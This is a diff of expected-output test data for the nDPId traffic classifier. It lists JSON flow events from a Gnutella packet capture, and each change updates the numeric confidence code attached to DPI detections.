-00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":63001,"flow_last_seen":63445,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":65062,"flow_last_seen":65418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1142,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":69227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1089,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00622{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":71216,"flow_last_seen":95489,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00792{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":63001,"flow_last_seen":63445,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00795{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":65062,"flow_last_seen":65418,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1142,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":69142,"flow_last_seen":69227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":1089,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.118.70","src_port":50235,"dst_port":6906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00622{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3091,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":71216,"flow_last_seen":95489,"flow_idle_time":140000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":191906,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} 00703{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3099,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":192636,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":243,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":243,"pkt_l4_len":209,"thread_ts_msec":192636,"pkt":"\/\/\/\/\/\/\/\/CAAn5uVZCABFAADlHP0AAIARA\/4KAAIPCgAC\/wCKAIoA0X6VEQKcLwoAAg8AigC7AAAgRU5GREVGRUVFSEVGRkhFSkVPREJEQUNBQ0FDQUNBQ0EAIEZIRVBGQ0VMRUhGQ0VQRkZGQUNBQ0FDQUNBQ0FDQUJOAP9TTUIlAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQAAIQAAAAAAAAAAAOgDAAAAAAAAAAAhAFYAAwABAAAAAgAyAFxNQUlMU0xPVFxCUk9XU0UAAQCAqQMATVNFREdFV0lOMTAAAAAAAAoAAxAAAA8BVaoA"} 00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3103,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":306,"flow_packet_id":2,"flow_last_seen":192907,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":192907,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0J3gAAIARnXEKAAIPKfk\/yHAJWDYAIGDxR05EED8+AQFUC1FLUlAGUk5BXS\/iNQlw"} 
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3104,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":2,"flow_last_seen":192907,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":192907,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0H4EAAIARbHsKAAIPTB5WkHAJ0j0AIK37R05EED8\/AQFUC1FLUlAGUk5BXS\/iNQlw"} 
@@ -1410,75 +1410,75 @@ 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3111,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":192908,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":192908,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0s0sAAIARB+8KAAIPrGHHDnAJGMoAIJamR05EED9GAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3112,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":3,"flow_last_seen":192908,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":192908,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0jJQAAIARUAcKAAIPp3KqnHAJXSQAIHOsR05EED9HAQFUC1FLUlAGUk5BXS\/iNQlw"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3113,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":192908,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":192908,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0770AAIARtrQKAAIPpanijnAJGMoAIIHcR05EED9IAQFUC1FLUlAGUk5BXS\/iNQlw"} -00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":13118,"flow_last_seen":15640,"flow_idle_time":200000,"flow_min_l4_payload_len":1073,"flow_max_l4_payload_len":1073,"flow_tot_l4_payload_len":12876,"flow_avg_l4_payload_len":1073,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12446,"flow_last_seen":12446,"flow_idle_time":200000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} -00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12447,"flow_last_seen":12447,"flow_idle_time":200000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00667{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":13118,"flow_last_seen":15640,"flow_idle_time":200000,"flow_min_l4_payload_len":1073,"flow_max_l4_payload_len":1073,"flow_tot_l4_payload_len":12876,"flow_avg_l4_payload_len":1073,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63957,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12446,"flow_last_seen":12446,"flow_idle_time":200000,"flow_min_l4_payload_len":314,"flow_max_l4_payload_len":314,"flow_tot_l4_payload_len":314,"flow_avg_l4_payload_len":314,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12447,"flow_last_seen":12447,"flow_idle_time":200000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.2","dst_ip":"10.0.2.15","src_port":67,"dst_port":68,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":73299,"flow_last_seen":75239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.201.161","src_port":50256,"dst_port":2886,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":73299,"flow_last_seen":75239,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.233.201.161","src_port":50256,"dst_port":2886,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74329,"flow_last_seen":74396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1102,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":13118,"flow_last_seen":15640,"flow_idle_time":200000,"flow_min_l4_payload_len":1091,"flow_max_l4_payload_len":1091,"flow_tot_l4_payload_len":13092,"flow_avg_l4_payload_len":1091,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} -00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":15285,"flow_last_seen":21297,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63960,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} -00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72264,"flow_last_seen":72720,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72656,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":954,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":149,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74329,"flow_last_seen":74396,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1102,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"80.61.221.246","src_port":50262,"dst_port":30577,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":13118,"flow_last_seen":15640,"flow_idle_time":200000,"flow_min_l4_payload_len":1091,"flow_max_l4_payload_len":1091,"flow_tot_l4_payload_len":13092,"flow_avg_l4_payload_len":1091,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63958,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} +00666{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":15285,"flow_last_seen":21297,"flow_idle_time":200000,"flow_min_l4_payload_len":95,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":475,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::c","src_port":63960,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00793{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72264,"flow_last_seen":72720,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":848,"flow_avg_l4_payload_len":84,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"27.94.154.53","src_port":50250,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72656,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":954,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"123.202.31.113","src_port":50252,"dst_port":19768,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00573{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":75359,"flow_last_seen":77504,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
00557{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":75359,"flow_last_seen":77504,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00794{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":63001,"flow_last_seen":78562,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":1097,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":50198,"dst_port":9915,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00797{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":146,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":74327,"flow_last_seen":74692,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":600,"flow_tot_l4_payload_len":1108,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"183.179.90.112","src_port":50259,"dst_port":9852,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00799{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":72266,"flow_last_seen":72907,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":601,"flow_tot_l4_payload_len":1105,"flow_avg_l4_payload_len":110,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":50253,"dst_port":43508,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"224.0.0.252","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} 
-00669{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":12529,"flow_last_seen":12529,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip6","src_ip":"fe80::c50d:519f:96a4:e108","dst_ip":"ff02::1:3","src_port":63717,"dst_port":5355,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"LLMNR","breed":"Acceptable","category":"Network"}} -00664{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":3194,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":15469,"flow_last_seen":22405,"flow_idle_time":200000,"flow_min_l4_payload_len":624,"flow_max_l4_payload_len":624,"flow_tot_l4_payload_len":4368,"flow_avg_l4_payload_len":624,"midstream":0,"thread_ts_msec":201412,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"239.255.255.250","src_port":63964,"dst_port":3702,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WSD","breed":"Acceptable","category":"Network"}} 